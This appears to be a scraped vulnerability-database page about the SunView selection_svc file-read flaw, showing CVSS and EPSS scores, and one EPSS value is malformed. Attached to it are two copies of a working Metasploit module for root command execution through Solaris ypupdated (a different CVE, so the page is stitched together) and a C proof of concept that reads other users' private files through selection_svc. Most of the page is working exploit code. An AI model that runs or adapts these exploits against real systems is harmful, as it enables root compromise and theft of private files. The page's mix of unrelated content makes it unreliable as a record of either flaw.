CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
The SunView (SunTools) selection_svc facility allows remote users to read files.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
5
AV:N/AC:L/Au:N/C:P/I:N/A:N
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
69.65%
–
–
2023-03-12
–
–
–
1.75%
–
2023-10-01
–
–
–
1.75%
–
2024-02-11
–
–
–
55.78%
–
2024-06-02
–
–
–
55.78%
–
2025-01-19
–
–
–
55.78%
–
2025-03-18
–
–
–
–
44.17%
2025-03-18
–
–
–
–
44.17,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# $Id: ypupdated_exec.rb 9929 2010-07-25 21:37:54Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <druid@caughq.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9929 $',
'References' =>
[
['CVE', '1999-0209'],
['OSVDB', '11517'],
['BID', '1749'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 1994'
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status('Sending PortMap request for ypupdated program')
pport = sunrpc_create('udp', program, progver)
print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
print_status('Waiting for response...')
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_status('No Errors, appears to have succeeded!')
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_error('Warning: ' + $!)
end
end
____ ____ __ __
/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/
Computer Academic Underground
http://www.caughq.org
Exploit Code
===============/========================================================
Exploit ID: CAU-EX-2008-0001
Release Date: 2008.04.04
Title: ypupdated_exec.rb
Description: Solaris ypupdated Command Execution
Tested: Solaris x86/sparc 10, sparc 9, 8, 2.7
Attributes: Remote, NULL Auth, Elevated Privileges, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0001.txt
Author/Email: I)ruid <druid (@) caughq.org>
===============/========================================================
Description
===========
This exploit targets a weakness in the way the ypupdated RPC application
uses the command shell when handling a MAP UPDATE request. Extra
commands may be launched through this command shell, which runs as root
on the remote host, by passing commands in the format '|<command>'.
Credits
=======
Josh D. <mcpheea@cadvision.com> from Avalon Security Research is
credited with originally discovering this vulnerability.
This Metasploit exploit module was modeled after kcope's exploit
released to Milw0rm on 2008.03.20.
References
==========
http://osvdb.org/displayvuln.php?osvdb_id=11517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=1999-0209
https://www.securityfocus.com/bid/1749/info
http://www.milw0rm.com/exploits/5282
Metasploit
==========
require 'msf/core'
module Msf
class Exploits::Solaris::Sunrpc::YPUpdateDExec < Msf::Exploit::Remote
include Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris ypupdated Command Execution',
'Description' => %q{
This exploit targets a weakness in the way the ypupdated RPC
application uses the command shell when handling a MAP UPDATE
request. Extra commands may be launched through this command
shell, which runs as root on the remote host, by passing
commands in the format '|<command>'.
Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
ypupdated is started with the '-i' command-line option.
},
'Author' => [ 'I)ruid <druid@caughq.org>' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 4498 $',
'References' =>
[
['BID', '1749'],
['CVE', '1999-0209'],
['OSVDB', '11517'],
],
'Privileged' => true,
'Platform' => ['unix', 'solaris'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
hostname = datastore['HOSTNAME']
program = 100028
progver = 1
procedure = 1
print_status 'Sending PortMap request for ypupdated program'
pport = sunrpc_create('udp', program, progver)
print_status "Sending MAP UPDATE request with command '#{payload.encoded}'"
print_status 'Waiting for response...'
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
print_good 'No Errors, appears to have succeeded!'
rescue ::Rex::Proto::SunRPC::RPCTimeout
print_status 'Warning: ' + $!
print_status 'Exploit may or may not have succeeded.'
end
end
end
# milw0rm.com [2008-04-04]
Publication date : 1990-08-13 22h00 +00:00 Author : Peter Shipley EDB Verified : Yes
Source: https://www.securityfocus.com/bid/8/info
On Sun3 and Sun4 systems, a remote system can read any file that is readable to the user running SunView. On the 386i, a remote system can read any file on the workstation running SunView regardless of protections. Note that if root runs Sunview, all files are potentially accessible by a remote system.
Sunview does not kill the selection_svc process when the user quits from Sunview. Thus, unless the process is killed, remote systems can still read files that were readable to the last user that ran Sunview. Under these circumstances, once a user has run Sunview, start using another window system (such as X11), or even logoff, but still have files accessible to remote systems.
/* SELN_HOLD_FILE
* For use where someone has a selection_svc runnning as them, after an
* invocation of suntools:
*
* % cat their_private_file
* their_private_file: Permission denied
* % cc seln_hold_file.c -o seln_hold_file -lsuntool -lsunwindow
* % ./seln_hold_file their_private_file
* % get_selection 2
* < contents of their_private_file >
* %
*/
#include <stdio.h>
#include <sys/types.h>
#include <suntool/seln.h>
main(argc, argv)
int argc;
char *argv[];
{
Seln_result ret;
if (argc != 2) {
(void) fprintf(stderr, "usage: seln_grab file1\n");
exit(1);
}
ret = seln_hold_file(SELN_SECONDARY, argv[1]);
seln_dump_result(stdout, &ret);
printf("\n");
}
/*
* Local variables:
* compile-command: "cc -sun3 -Bstatic -o seln_hold_file seln_hold_file.c -lsun
tool -lsunwindow"
* end:
*
* Static required because _mem_ops not included in ld.so
*/